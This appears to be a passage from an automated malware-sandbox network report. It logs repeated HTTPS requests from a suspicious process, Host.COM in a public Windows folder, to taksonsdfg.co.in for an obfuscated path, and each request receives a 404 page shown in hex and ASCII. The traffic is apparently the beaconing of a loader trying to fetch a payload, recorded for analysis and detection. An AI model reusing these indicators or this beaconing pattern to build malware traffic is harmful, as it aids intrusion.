                                                                                    2024-10-14 02:29:25 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:25 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.449743108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:26 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:26 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:26 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:26 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:26 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.449745108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:27 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:27 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:27 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:27 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:27 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.449747108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:28 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:28 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:28 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:28 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:28 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.449749108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:29 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:29 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:29 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:29 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:29 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.449751108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:30 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:30 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:30 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:30 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:30 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.449754108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:31 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:32 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:31 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:32 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:32 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.449759108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:29:32 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:33 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:33 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:33 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
